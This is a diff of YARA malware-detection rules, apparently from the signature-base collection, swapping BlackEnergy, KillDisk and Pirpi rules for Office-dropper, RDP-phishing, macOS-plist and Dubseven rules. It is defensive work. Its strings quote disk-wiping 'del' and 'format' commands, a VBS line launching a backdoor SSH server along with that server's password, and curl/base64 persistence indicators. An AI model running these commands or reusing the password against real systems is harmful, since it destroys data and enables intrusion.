-		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
-		$s4 = "unable to load kernel32.dll" fullword ascii
-		$s5 = "index.php?c=%S&r=%x" fullword wide
-		$s6 = "%s len:%d " fullword ascii
-		$s7 = "Encountered error sending syscall response to client" fullword ascii
-		$s9 = "/info.dat" fullword ascii
-		$s10 = "Error entering thread lock" fullword ascii
-		$s11 = "Error exiting thread lock" fullword ascii
-		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+		$s1 = "\\Common Files\\Microsoft Shared\\" wide
+		$s2 = "Scripting.FileSystemObject" ascii
+		$a1 = "Document_Open" ascii
+		$a2 = "WScript.Shell" ascii
+		$a3 = "AutoOpen" fullword ascii
 
 	condition:
-		(1 of ( $x* ) ) or ( 8 of ( $s* ) )
+		uint16( 0 ) == 0xcfd0 and filesize < 100KB and all of ( $s* ) and 1 of ( $a* )
 }
-rule SIGNATURE_BASE_SUSP_WER_Critical_Heapcorruption : FILE
+rule SIGNATURE_BASE_SUSP_Excel_IQY_Remoteuri_Syntax : FILE
 {
 	meta:
-		description = "Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2b1dad5f-cc2c-5d8c-8275-ebb56d079895"
-		date = "2019-10-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1185459425710092288"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_wer_files.yar#L2-L18"
+		description = "Detects files with Excel IQY RemoteURI syntax"
+		author = "Nick Carr"
+		id = "ea3427da-9cce-5ad9-9c78-e3cee802ba80"
+		date = "2018-08-17"
+		modified = "2023-11-25"
+		reference = "https://twitter.com/ItsReallyNick/status/1030330473954897920"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L102-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "efa84e375f31ca37b9dd9c7a74251929ac957b9bd530e92f74b8836f56048fea"
-		score = 45
+		logic_hash = "7033b0a4226dd289ecc670a0807e4159dd4486f52bc80a6b5ddd34d6961ab163"
+		score = 55
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "ReportIdentifier=" wide
-		$a2 = ".Name=Fault Module Name" wide
-		$s1 = "c0000374" wide
+		$URL = "http"
+		$fp1 = "https://go.microsoft.com"
 
 	condition:
-		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of them
+		uint32( 0 ) == 0x0d424557 and uint32( 4 ) == 0x0a0d310a and filesize < 1MB and $URL and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_WER_Suspicious_Crash_Directory : FILE
+rule SIGNATURE_BASE_SUSP_Macro_Sheet_Obfuscated_Char : FILE
 {
 	meta:
-		description = "Detects a crashed application executed in a suspicious directory"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bf91e20c-aa35-5b13-86ed-a63e6fb4d1a2"
-		date = "2019-10-18"
+		description = "Finding hidden/very-hidden macros with many CHAR functions"
+		author = "DissectMalware"
+		id = "791e9bba-3e4e-5efd-a800-a612c6f92cfb"
+		date = "2020-04-07"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1185585050059976705"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_wer_files.yar#L20-L54"
+		reference = "https://twitter.com/DissectMalware/status/1247595433305800706"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L122-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a197feeafca38ffe33428fa807e2b80e3071ab8960926fc2f328748bda299910"
-		score = 45
-		quality = 60
+		logic_hash = "0953d1f916df570cb3d053bf4fdac196bdbd806df4b6c0a982ed9949a3676e6c"
+		score = 65
+		quality = 85
 		tags = "FILE"
+		hash1 = "0e9ec7a974b87f4c16c842e648dd212f80349eecb4e636087770bc1748206c3b"
 
 	strings:
-		$a1 = "ReportIdentifier=" wide
-		$a2 = ".Name=Fault Module Name" wide
-		$a3 = "AppPath=" wide nocase
-		$l1 = "AppPath=C:\\Windows\\" wide nocase
-		$l2 = "AppPath=C:\\Program" wide nocase
-		$l3 = "AppPath=C:\\Python" wide nocase
-		$l4 = "AppPath=C:\\Users\\" wide nocase
-		$s6 = "AppPath=C:\\Users\\Public\\" nocase wide
-		$s7 = "AppPath=C:\\Users\\Default\\" nocase wide
-		$s8 = /AppPath=C:\\Users\\[^\\]{1,64}\\AppData\\(Local|Roaming)\\[^\\]{1,64}\.exe/ wide nocase
+		$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
+		$s1 = "Excel" fullword ascii
+		$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
+		$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
+		$char_func = {06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 1E 3D  00 41 6F 00}
 
 	condition:
-		( uint32be( 0 ) == 0x56006500 or uint32be( 0 ) == 0xfffe5600 ) and all of ( $a* ) and ( not 1 of ( $l* ) or 1 of ( $s* ) )
+		$ole_marker at 0 and 1 of ( $macro_sheet_h* ) and #char_func > 10 and $s1
 }
-rule SIGNATURE_BASE_Pirpi_1609_A : FILE
+rule SIGNATURE_BASE_SUSP_RDP_File_Indicators_Oct24_1 : FILE
 {
 	meta:
-		description = "Detects Pirpi Backdoor - and other malware (generic rule)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "72b996e2-56cf-5a8d-8d8b-97eda7105d26"
-		date = "2016-09-08"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pirpi.yar#L10-L43"
+		description = "Detects characteristics found in malicious RDP files used as email attachments in spear phishing campaigns"
+		author = "Florian Roth"
+		id = "16128c1e-64ed-5a3e-ad1e-e0330d91f5a9"
+		date = "2024-10-25"
+		modified = "2024-12-12"
+		reference = "https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nobellium_rdp_phish.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "470745d0dd44c161ed6ec474f85531a3aca8ebb0adb98b902cb0b7465ca07d8b"
+		logic_hash = "55bd63738c38719ce7aeb874956488b0d3f7167a31d880ee61994b5921bd1458"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a5a0bc350e774bd784fc25090518626b65a3ce10c7401f44a1616ea2ae32f4c"
-		hash2 = "8caa179ec20b6e3938d17132980e0b9fe8ef753a70052f7e857b339427eb0f78"
+		hash1 = "280fbf353fdffefc5a0af40c706377142fff718c7b87bc8b0daab10849f388d0"
+		hash2 = "8b45f5a173e8e18b0d5c544f9221d7a1759847c28e62a25210ad8265f07e96d5"
+		hash3 = "9b8cb8b01ce4eafb9204250a3c28bfaf70cc76a99ce411ad52bbf1aa2b6cce34"
+		hash4 = "ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46"
+		hash5 = "f357d26265a59e9c356be5a8ddb8d6533d1de222aae969c2ad4dc9c40863bfe8"
 
 	strings:
-		$x1 = "expand.exe1.gif" fullword ascii
-		$c1 = "expand.exe" fullword ascii
-		$c2 = "ctf.exe" fullword ascii
-		$s1 = "flvUpdate.exe" fullword wide
-		$s2 = "www.ThinkWorking.com" fullword wide
-		$s3 = "ctfnon.exe" fullword ascii
-		$s4 = "flv%d.exe" fullword ascii
-		$s5 = "HARDWARE\\DESCRIPTION\\System\\BIOS" fullword ascii
-		$s6 = "12811[%d].gif" fullword ascii
-		$s7 = "GetApp03" fullword wide
-		$s8 = "flvUpdate" fullword wide
-		$s9 = "%d-%4.4d%d" fullword ascii
-		$s10 = "http://%s/%5.5d.html" fullword ascii
-		$s11 = "flvbho.exe" fullword wide
-		$op1 = { 74 08 c1 cb 0d 03 da 40 eb }
-		$op2 = { 03 f5 56 8b 76 20 03 f5 33 c9 49 }
-		$op3 = { 03 dd 66 8b 0c 4b 8b 5e 1c 03 dd 8b 04 8b 03 c5 }
+		$s1 = "redirectclipboard:i:1" wide fullword
+		$s2 = "redirectprinters:i:1" wide fullword
+		$s3 = "remoteapplicationmode:i:1" wide fullword
+		$s4 = "username:s:" wide
+		$s5 = "emoteapplicationicon:s:C:\\Windows\\SystemApps" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or all of ( $c* ) or all of ( $op* ) ) ) or ( 8 of them )
+		filesize < 50KB and all of them
 }
-rule SIGNATURE_BASE_Pirpi_1609_B : FILE
+rule SIGNATURE_BASE_VUL_Jquery_Fileupload_CVE_2018_9206 : CVE_2018_9206
 {
 	meta:
-		description = "Detects Pirpi Backdoor"
+		description = "Detects JQuery File Upload vulnerability CVE-2018-9206"
 		author = "Florian Roth (Nextron Systems)"
-		id = "caf63b97-efd7-5cd4-8954-b86db4d93cf5"
-		date = "2016-09-08"
+		id = "20bac44c-0e5a-5561-9fd8-a71cd2d8590a"
+		date = "2018-10-19"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/igxLyF"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pirpi.yar#L45-L65"
+		reference = "https://blogs.akamai.com/sitr/2018/10/having-the-security-rug-pulled-out-from-under-you.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_jquery_fileupload_cve_2018_9206.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4dafff80fb7bfcffccf96d991245c13b3208fd4f5a21488d7d6885758ef05078"
+		logic_hash = "ef7cc13130c60ece346802cb6efec96065f84407fb84b89703628fdf32c0ee53"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "498b98c02e19f4b03dc6a3a8b6ff8761ef2c0fedda846ced4b6f1c87b52468e7"
+		tags = "CVE-2018-9206"
 
 	strings:
-		$s1 = "tconn <ip> <port> //set temp connect value, and disconnect." fullword ascii
-		$s2 = "E* ListenCheckSsl SslRecv fd(%d) Error ret:%d %d" fullword ascii
-		$s3 = "%s %s L* ListenCheckSsl fd(%d) SslV(-%d-)" fullword ascii
-		$s4 = "S:%d.%d-%d.%d V(%d.%d) Listen On %d Ok." fullword ascii
-		$s5 = "E* ListenCheckSsl fd(%d) SslAccept Err %d" fullword ascii
-		$s6 = "%s-%s N110 Ssl Connect Ok(%s:%d)." fullword ascii
-		$s7 = "%s-%s N110 Basic Connect Ok(%s:%d)." fullword ascii
-		$s8 = "tconn <ip> <port>" fullword ascii
+		$s1 = "error_reporting(E_ALL | E_STRICT);" fullword ascii
+		$s2 = "require('UploadHandler.php');" fullword ascii
+		$s3 = "$upload_handler = new UploadHandler();" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 4 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Blackenergy_BE_2 : FILE
+rule SIGNATURE_BASE_SUSP_Macos_Plist_Suspicious : FILE
 {
 	meta:
-		description = "Detects BlackEnergy 2 Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c93991b9-77e8-5a73-80ef-e21df770c3a5"
-		date = "2015-02-19"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/DThzLz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L8-L25"
+		description = "Suspicious PLIST files in MacOS (possible malware persistence)"
+		author = "John Lambert @JohnLaTwC"
+		id = "61b5986d-35c9-5e1a-a077-14cecdbed36f"
+		date = "2018-12-14"
+		modified = "2025-03-21"
+		old_rule_name = "gen_malware_MacOS_plist_suspicious"
+		reference = "https://objective-see.com/blog/blog_0x3A.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_malware_MacOS_plist_suspicious.yar#L1-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
-		logic_hash = "77ecab353063bf8be5ec70294f8497234af8ddd944e0b207d8d633f59f76dbb6"
-		score = 75
-		quality = 85
+		logic_hash = "1cca4b859148d95c9e150116e08230424544ebd0886a4d152e493476b9f91a75"
+		score = 60
+		quality = 33
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0541fc6a11f4226d52ae3d4158deb8f50ed61b25bb5f889d446102e1ee57b76d"
+		hash2 = "6cc6abec7d203f99c43ce16630edc39451428d280b02739757f17fd01fc7dca3"
+		hash3 = "76eb97aba93979be06dbf0a872518f9514d0bb20b680c887d6fd5cc79dce3681"
+		hash4 = "8921e3f1955f7141d1231f8cfd95230143525f259e578fdc1dd98494f62ec4a1"
+		hash5 = "9a3fd0d2b0bca7d2f7e3c70cb15a7005a1afa1ce78371fd3fa9c526a288b64ce"
+		hash6 = "737355121685afc38854413d8a1657886f9aa24f54673953749386defe843017"
+		hash7 = "9b77622653934995ee8bb5562df311f5bb6d6719933e2671fe231a664da76d30"
+		hash8 = "c449f8115b4b939271cb92008a497457e1ab1cf2cbd8f4b58f7ba955cf5624f0"
+		hash9 = "cdb2fb9c8e84f0140824403ec32a2431fb357cd0f184c1790152834cc3ad3c1b"
 
 	strings:
-		$s0 = "<description> Windows system utility service  </description>" fullword ascii
-		$s1 = "WindowsSysUtility - Unicode" fullword wide
-		$s2 = "msiexec.exe" fullword wide
-		$s3 = "WinHelpW" fullword ascii
-		$s4 = "ReadProcessMemory" fullword ascii
+		$sr1 = "PropertyList-"
+		$sr2 = "<plist"
+		$p1 = "python" ascii
+		$p2 = "<string>-c" ascii
+		$v0 = /\<string\>[\/|\w]{0,20}\+[\/|\+|=|\w]{59,80}\<\/string\>/
+		$v1 = "curl " fullword
+		$v2 = "PAYLOAD_DATA"
+		$v3 = "base64"
+		$vb640 = /(AAQQBZAEwATwBBAEQAXwBCAEEAUwBFADYANA|AEEAWQBMAE8AQQBEAF8AQgBBAFMARQA2ADQA|BBWUxPQURfQkFTRTY0|QVlMT0FEX0JBU0U2N|UABBAFkATABPAEEARABfAEIAQQBTAEUANgA0A|UEFZTE9BRF9CQVNFNj)/
+		$vb641 = /(AHUAYgBwAHIAbwBjAGUAcwBzA|c3VicHJvY2Vzc|cwB1AGIAcAByAG8AYwBlAHMAcw|dWJwcm9jZXNz|MAdQBiAHAAcgBvAGMAZQBzAHMA|N1YnByb2Nlc3)/
+		$vb642 = "IyEvdXNy"
+		$vb643 = "IyAtKi0"
+		$vb644 = /(AGQAZABfAGgAZQBhAGQAZQByA|EAZABkAF8AaABlAGEAZABlAHIA|FkZF9oZWFkZX|YQBkAGQAXwBoAGUAYQBkAGUAcg|YWRkX2hlYWRlc|ZGRfaGVhZGVy)/
+		$fp1 = "&#10;do&#10;&#09;echo"
+		$fp2 = "<string>com.cisco.base64</string>"
+		$fp3 = "video/mp4;base64"
+		$fp4 = "<key>Content-Length</key>"
+		$fp5 = "<string>yara</string>"
+		$fp6 = "<key>Frameworks/base64.framework</key>" ascii
+		$fp7 = "<key>Headers/base64.h</key>" ascii
+		$fp8 = "database64" ascii fullword
+		$fp9 = "<!-- last arg will be replaced by the installer script -->" ascii
+		$fp10 = "<key>/usr/local/bin/python</key>"
+		$fp11 = "<key>/usr/bin/ruby</key>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of ( $s* )
+		filesize < 20KB and uint32be( 0 ) == 0x3c3f786d and all of ( $sr* ) and @sr2 [ 1 ] < 0x100 and ( 1 of ( $v* ) or all of ( $p* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Blackenergy_VBS_Agent : FILE
+rule SIGNATURE_BASE_Dubseven_File_Set : FILE
 {
 	meta:
-		description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0876f752-d476-5706-918e-edfda9bd7928"
-		date = "2016-01-03"
+		description = "Searches for service files loading UP007"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "5b0a9cb9-aeef-5508-8854-51ad846b22c5"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L34-L49"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
-		logic_hash = "2a0037a76f1031117fe41b2e41691511eb626ffc0c738547eda24f771505bc67"
+		logic_hash = "af98ab901ca97a350aa837779d74208a780b1099e113cfa59bee2eb33690918e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
-		$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
-		$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii
+		$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
+		$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
+		$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
+		$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
+		$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
+		$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
+		$file7 = "\\Microsoft\\Internet Explorer\\mon"
+		$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
 
 	condition:
-		filesize < 1KB and 2 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 3 of ( $file* )
 }
-rule SIGNATURE_BASE_Dropbear_SSH_Server : FILE
+rule SIGNATURE_BASE_Dubseven_Dropper_Registry_Checks : FILE
 {
 	meta:
-		description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "22595d8b-b7ea-570e-ad17-d5bcec613abf"
-		date = "2016-01-03"
+		description = "Searches for registry keys checked for by the dropper"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "8369cdbb-53b8-5dc5-9181-fd49747042a7"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L51-L69"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L31-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
-		logic_hash = "6b8acaaa64329d09d3d22d74f4f40288fba3f5faaff63e1ee6b2e6153f14d730"
-		score = 50
+		logic_hash = "813ff641a4213cf9d56013768e284e7f622a223c6c4f585c3bbbcf69fc03723c"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
-		$s2 = "Badly formatted command= authorized_keys option" fullword ascii
-		$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
-		$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
-		$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
+		$reg1 = "SOFTWARE\\360Safe\\Liveup"
+		$reg2 = "Software\\360safe"
+		$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
+		$reg4 = "SOFTWARE\\Avira\\Avira Destop"
+		$reg5 = "SOFTWARE\\rising\\RAV"
+		$reg6 = "SOFTWARE\\JiangMin"
+		$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of ( $reg* )
 }
-rule SIGNATURE_BASE_Blackenergy_Backdoorpass_Dropbear_SSH : FILE
+rule SIGNATURE_BASE_Dubseven_Dropper_Dialog_Remains : FILE
 {
 	meta:
-		description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
-		author = "Florian Roth (Nextron Systems)"
-		id = "60db00dd-72b3-5a28-90de-2a397b1e007b"
-		date = "2016-01-03"
+		description = "Searches for related dialog remnants. How rude."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "6029ea74-26fc-57d1-aaed-be1ea2138844"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L71-L84"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L59-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
-		logic_hash = "3af58d155691d9323458280ad1b933e8e784acafb0974f5f267b93d9b02e825e"
+		logic_hash = "322ddc1210b6bde393970c61113e6efcb87a3529db386323dfd08973e5d2703e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "passDs5Bu9Te7" fullword ascii
+		$dia1 = "fuckMessageBox 1.0" wide
+		$dia2 = "Rundll 1.0" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s1
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of them
 }
-rule SIGNATURE_BASE_Blackenergy_Killdisk_1 : FILE
+rule SIGNATURE_BASE_Maindll_Mutex : FILE
 {
 	meta:
-		description = "Detects KillDisk malware from BlackEnergy"
-		author = "Florian Roth (Nextron Systems)"
-		id = "304e7aa3-48d3-5015-aaf1-6b1df2441b75"
-		date = "2016-01-03"
+		description = "Matches on the maindll mutex"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "7a89dae3-9e03-5803-9729-78e6e65e91d3"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L88-L115"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L83-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa64434422a16166938b9eede9c50b79bae90632f1500e6529dcf26dbebe50f1"
-		score = 80
+		logic_hash = "8d3311164104198e02e700c2e9a5293e55d75d63b39c75c4e375b7f35eb5fde4"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
-		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
-		hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
-		hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$s0 = "system32\\cmd.exe" fullword ascii
-		$s1 = "system32\\icacls.exe" fullword wide
-		$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
-		$s3 = "shutdown /r /t %d" fullword ascii
-		$s4 = "/C /Q /grant " fullword wide
-		$s5 = "%08X.tmp" fullword ascii
-		$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
-		$s7 = "/c format %c: /Y /Q" fullword ascii
-		$s8 = "taskhost.exe" fullword wide
-		$s9 = "shutdown.exe" fullword wide
+		$mutex = "h31415927tttt"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 8 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
 }
-rule SIGNATURE_BASE_Blackenergy_Killdisk_2 : FILE
+rule SIGNATURE_BASE_Slserver_Dialog_Remains : FILE
 {
 	meta:
-		description = "Detects KillDisk malware from BlackEnergy"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0304e87-a278-5963-9af0-935c088c00ec"
-		date = "2016-01-03"
-		modified = "2023-01-06"
-		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L117-L138"
+		description = "Searches for related dialog remnants."
+		author = "Matt Brooks, @cmatthewbrooks / modified by Florian Roth"
+		id = "cf199d25-ce5e-52c2-88de-32a48dee4c6f"
+		date = "2016-04-18"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L106-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "38ce9ab347690914f27e7ae89cc6fb2af02ee223e21822eb3b75fde772d3eaff"
-		score = 80
+		logic_hash = "5b18f4a6c54b456ae697e9639e8c3041fd4f3141d89850c3e1d3d4e220c3cea3"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
-		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
-		hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
 
 	strings:
-		$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
-		$s1 = "%s%08X.tmp" fullword ascii
-		$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide
-		$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
+		$slserver = "SLServer" wide fullword
+		$fp1 = "Dell Inc." wide fullword
+		$fp2 = "ScriptLogic Corporation" wide
+		$extra1 = "SLSERVER" wide fullword
+		$extra2 = "\\SLServer.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 3 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and not 1 of ( $fp* ) and 1 of ( $extra* ) and $slserver
 }
-rule SIGNATURE_BASE_Blackenergy_Driver_USBMDM : FILE
+rule SIGNATURE_BASE_Slserver_Mutex : FILE
 {
 	meta:
-		description = "Black Energy Driver"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d5e8faf0-38cb-5193-b859-83ea09278011"
-		date = "2016-01-04"
+		description = "Searches for the mutex."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "decdefd0-fe20-5adf-9d8c-0e2b954481a0"
+		date = "2016-04-18"
 		modified = "2023-12-05"
